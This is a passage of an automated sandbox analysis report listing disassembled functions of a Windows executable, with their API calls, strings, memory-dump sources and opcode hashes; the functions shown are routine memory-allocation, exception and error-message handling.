                                                                                                                                                      • Associated: 00000000.00000002.2403479287.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403571607.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FileModuleName_wcsrchr
                                                                                                                                                      • String ID: LocalizeStringManager using %s as current directory
                                                                                                                                                      • API String ID: 2248907744-3895964262
                                                                                                                                                      • Opcode ID: 7cd2c1b80a029071a3d868f380ad8c9d071f960110b7558a6fa8be9300c1221a
                                                                                                                                                      • Instruction ID: 4914ca9474b3b6dcf73fb687ff8e699b62779e70258942b32276ef7647460a0e
                                                                                                                                                      • Opcode Fuzzy Hash: 7cd2c1b80a029071a3d868f380ad8c9d071f960110b7558a6fa8be9300c1221a
                                                                                                                                                      • Instruction Fuzzy Hash: 73418031A006099FD720DF68CC41B9AB3B8FF44324F14C7BAE569972D1DB74AA46CB94
                                                                                                                                                      Function 00411110 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 93COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00413B9C: _malloc.LIBCMT ref: 00413BB6
                                                                                                                                                      • std::exception::exception.LIBCMT ref: 004111CD
                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 004111E2
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.2403062501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403157155.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403186216.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403211249.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403249758.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403276732.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403301333.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403333264.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403361326.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403413640.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403435137.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403456156.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403479287.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403571607.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Exception@8Throw_mallocstd::exception::exception
                                                                                                                                                      • String ID: xsB
                                                                                                                                                      • API String ID: 4063778783-962849395
                                                                                                                                                      • Opcode ID: f543cbc906ccd7650bb8cef791ecf8621ec6dbe073bee27d7945717985af6bf3
                                                                                                                                                      • Instruction ID: f8c27ee7699648d13f13efa6e74f78b5188a6d8a1a52f74fbe54ada12fea284d
                                                                                                                                                      • Opcode Fuzzy Hash: f543cbc906ccd7650bb8cef791ecf8621ec6dbe073bee27d7945717985af6bf3
                                                                                                                                                      • Instruction Fuzzy Hash: 7121D1B2A04209ABC710DF98D941ADAF7F8EB48314F10466FE558E3741D774AA40C7A5
                                                                                                                                                      Function 00412D50 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 84windowCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000409), ref: 00412DB5
                                                                                                                                                      • LocalFree.KERNEL32(00000000,?,00000000), ref: 00412DEC
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.2403062501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403157155.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403186216.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403211249.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403249758.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403276732.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403301333.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403333264.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403361326.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403413640.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403435137.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403456156.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403479287.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403571607.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FormatFreeLocalMessage
                                                                                                                                                      • String ID: Error Code: %d
                                                                                                                                                      • API String ID: 1427518018-2830492919
                                                                                                                                                      • Opcode ID: 3415c24533acf48bc6660d8af8cfce90d1b605f354cacb28b3ad35756c2ea678
                                                                                                                                                      • Instruction ID: a3734aff581861bf4bd9e8a013a4e5c8eddb5f0eb71fb30c564b9f95807e7a34
                                                                                                                                                      • Opcode Fuzzy Hash: 3415c24533acf48bc6660d8af8cfce90d1b605f354cacb28b3ad35756c2ea678
                                                                                                                                                      • Instruction Fuzzy Hash: 7A21D672B04208AFC710DF99EC81BABF7B8FB48765F44413BE909D3380D6745D0086A4
                                                                                                                                                      Function 00406CC0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 81libraryloaderCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • GetProcAddress.KERNEL32(Command,Command), ref: 00406CF1
                                                                                                                                                        • Part of subcall function 00406EB0: MultiByteToWideChar.KERNEL32(00000003,00000000,?,000000FF,00000000,00000000,?,?,0040EFC6,?,?,?,?), ref: 00406EC3
                                                                                                                                                        • Part of subcall function 00406EB0: MultiByteToWideChar.KERNEL32(00000003,00000000,?,000000FF,00000000,-00000001,?,?,?), ref: 00406EF7
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.2403062501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403157155.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403186216.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403211249.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403249758.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403276732.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403301333.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403333264.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403361326.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403413640.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403435137.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403456156.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403479287.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403571607.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ByteCharMultiWide$AddressProc
                                                                                                                                                      • String ID: Command$Could not resolve entrypoint '%hs'
                                                                                                                                                      • API String ID: 2457830408-477499498
                                                                                                                                                      • Opcode ID: a9f7127ece779c968760b600d952e9c33bb55f2fbd910c81e7ff8309745010cc
                                                                                                                                                      • Instruction ID: 02b3cd1bbd1a4042562dcd474d745e4de0b4e4c892e2f8a9ac46497f55fea694
                                                                                                                                                      • Opcode Fuzzy Hash: a9f7127ece779c968760b600d952e9c33bb55f2fbd910c81e7ff8309745010cc
                                                                                                                                                      • Instruction Fuzzy Hash: 89218B71700205AFD714DF58DC41BAAB7A9FF44324F01437AF926E73D1DB78A9048A98
                                                                                                                                                      Function 00412320 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 75COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00413B9C: _malloc.LIBCMT ref: 00413BB6
                                                                                                                                                      • std::exception::exception.LIBCMT ref: 004123E1
                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 004123F6
                                                                                                                                                        • Part of subcall function 00401900: _memcpy_s.LIBCMT ref: 0040195A
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.2403062501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403157155.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403186216.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403211249.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403249758.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403276732.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403301333.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403333264.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403361326.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403413640.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403435137.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403456156.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403479287.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403571607.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Exception@8Throw_malloc_memcpy_sstd::exception::exception
                                                                                                                                                      • String ID: xsB
                                                                                                                                                      • API String ID: 1787139365-962849395
                                                                                                                                                      • Opcode ID: 388a42301bbcb7613fab76e40e9462ebc7aecf3065e82f0e0dac7605c1fedc70
                                                                                                                                                      • Instruction ID: 6ea011b9a4285e4b5e01de87a8495eb2b241b38f0326e3fd5f69aa65fd4c8ce2
                                                                                                                                                      • Opcode Fuzzy Hash: 388a42301bbcb7613fab76e40e9462ebc7aecf3065e82f0e0dac7605c1fedc70
                                                                                                                                                      • Instruction Fuzzy Hash: 20219DB2A006499FCB10DFA8D541A9EFBF4FB48704F10866FE459E3741DB74AA00CBA5
                                                                                                                                                      Function 00404AF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00413B9C: _malloc.LIBCMT ref: 00413BB6
                                                                                                                                                      • std::exception::exception.LIBCMT ref: 00404B96
                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 00404BAB
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.2403062501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403157155.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403186216.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403211249.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403249758.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403276732.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403301333.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403333264.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403361326.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403413640.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403435137.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403456156.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403479287.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403571607.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Exception@8Throw_mallocstd::exception::exception
                                                                                                                                                      • String ID: xsB
                                                                                                                                                      • API String ID: 4063778783-962849395
                                                                                                                                                      • Opcode ID: 61c1e7d8d0493a0aa168af15573492feea997b9efbd426ed01a61629bdfa5d77
                                                                                                                                                      • Instruction ID: fe2611e71e1b4d3eab35b47a04658717641b3f6e96e165b590f39325d49202ba
                                                                                                                                                      • Opcode Fuzzy Hash: 61c1e7d8d0493a0aa168af15573492feea997b9efbd426ed01a61629bdfa5d77
                                                                                                                                                      • Instruction Fuzzy Hash: 811193B5900218DFCB00DF59D841BDEFBB4FB44754F10862EE815A7381D779A604CBA5
                                                                                                                                                      Function 00410940 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00413B9C: _malloc.LIBCMT ref: 00413BB6
                                                                                                                                                      • std::exception::exception.LIBCMT ref: 004109EB
                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 00410A00
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.2403062501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403157155.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403186216.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403211249.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403249758.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403276732.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403301333.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403333264.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403361326.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403413640.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403435137.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403456156.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403479287.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403571607.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Exception@8Throw_mallocstd::exception::exception
                                                                                                                                                      • String ID: xsB
                                                                                                                                                      • API String ID: 4063778783-962849395
                                                                                                                                                      • Opcode ID: e868a53083fa1d7e98f619ebe31d704fd0f5ffdd214e531418ba4b8e1b0047f6
                                                                                                                                                      • Instruction ID: 166044deac4ff419852e9ba3ba567c278087cb3695f227ff17d03246f23ed495
                                                                                                                                                      • Opcode Fuzzy Hash: e868a53083fa1d7e98f619ebe31d704fd0f5ffdd214e531418ba4b8e1b0047f6
                                                                                                                                                      • Instruction Fuzzy Hash: 1F21ACB5A00248DFCB00DF99C841ADAFBF4EB48B04F10856FE819A7342D734AA04CBA5
                                                                                                                                                      Function 00406730 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00413B9C: _malloc.LIBCMT ref: 00413BB6
                                                                                                                                                        • Part of subcall function 00413B9C: std::exception::exception.LIBCMT ref: 00413BEB
                                                                                                                                                        • Part of subcall function 00413B9C: std::exception::exception.LIBCMT ref: 00413C05
                                                                                                                                                        • Part of subcall function 00413B9C: __CxxThrowException@8.LIBCMT ref: 00413C16
                                                                                                                                                      • std::exception::exception.LIBCMT ref: 004067BF
                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 004067D4
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.2403062501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403157155.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403186216.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403211249.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403249758.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403276732.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403301333.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403333264.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403361326.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403413640.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403435137.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403456156.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403479287.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403571607.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: std::exception::exception$Exception@8Throw$_malloc
                                                                                                                                                      • String ID: xsB
                                                                                                                                                      • API String ID: 2621100827-962849395
                                                                                                                                                      • Opcode ID: d8b1f9951333e666c1138fb743c057d0b6af5fc21088406b91705fcf76692e51
                                                                                                                                                      • Instruction ID: 442295aed09c8a9df1bfa44d5f6881dde2d5152ee126d028579eef18df08d8eb
                                                                                                                                                      • Opcode Fuzzy Hash: d8b1f9951333e666c1138fb743c057d0b6af5fc21088406b91705fcf76692e51
                                                                                                                                                      • Instruction Fuzzy Hash: 3321FFB1900714CFC720DF5AC841A9AFBF4FB48714F104A2FE85AA3781E738A645CB99
                                                                                                                                                      Function 004115E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00413B9C: _malloc.LIBCMT ref: 00413BB6
                                                                                                                                                        • Part of subcall function 00413B9C: std::exception::exception.LIBCMT ref: 00413BEB
                                                                                                                                                        • Part of subcall function 00413B9C: std::exception::exception.LIBCMT ref: 00413C05
                                                                                                                                                        • Part of subcall function 00413B9C: __CxxThrowException@8.LIBCMT ref: 00413C16
                                                                                                                                                      • std::exception::exception.LIBCMT ref: 0041166A
                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 0041167F
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.2403062501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403157155.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403186216.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403211249.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403249758.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403276732.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403301333.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403333264.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403361326.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403413640.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403435137.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403456156.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403479287.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403571607.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: std::exception::exception$Exception@8Throw$_malloc
                                                                                                                                                      • String ID: xsB
                                                                                                                                                      • API String ID: 2621100827-962849395
                                                                                                                                                      • Opcode ID: 5e83b65dfe0557c6d34ed6807040035208e33360ec2f6d9411a2bf6e0ed9750e
                                                                                                                                                      • Instruction ID: d126037be6ae07cf9ee6d5e3eb27cb285719d2fc9e1c908c41d8478ed4238dae
                                                                                                                                                      • Opcode Fuzzy Hash: 5e83b65dfe0557c6d34ed6807040035208e33360ec2f6d9411a2bf6e0ed9750e
                                                                                                                                                      • Instruction Fuzzy Hash: 3B21CDB1940314DFDB10DF95D901BDAB7F4EB04B08F00462EE906A7390E7B8A644CB99
